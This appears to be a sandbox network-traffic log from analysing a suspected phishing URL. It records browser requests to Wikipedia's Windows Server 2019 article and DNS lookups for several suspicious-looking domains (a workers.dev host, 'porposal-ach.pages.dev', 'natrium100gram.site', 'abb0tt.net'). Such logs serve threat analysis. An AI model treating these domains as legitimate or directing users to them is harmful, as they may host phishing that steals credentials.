Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022&skin=vector-2022&version=5bkcg HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/images/project-logos/enwiki.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/favicon/wikipedia.ico HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022&skin=vector-2022&version=5bkcg HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqi HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1kwga HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /wiki/Special:CentralAutoLogin/start?type=script HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /static/images/project-logos/enwiki.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /static/favicon/wikipedia.ico HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1kwga HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1Host: login.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqi HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1Host: login.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/rest_v1/page/summary/Programmer HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /api/rest_v1/page/summary/Programmer HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /api/rest_v1/page/summary/Software_release_life_cycle HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /api/rest_v1/page/summary/Software_release_life_cycle HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbs HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbs HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: tiny-hat-eab8.pagenew.workers.dev
Source: global trafficDNS traffic detected: DNS query: porposal-ach.pages.dev
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: natrium100gram.site
Source: global trafficDNS traffic detected: DNS query: abb0tt.net
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: href.li
Source: global trafficDNS traffic detected: DNS query: en.wikipedia.org
Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: meta.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: login.wikimedia.org
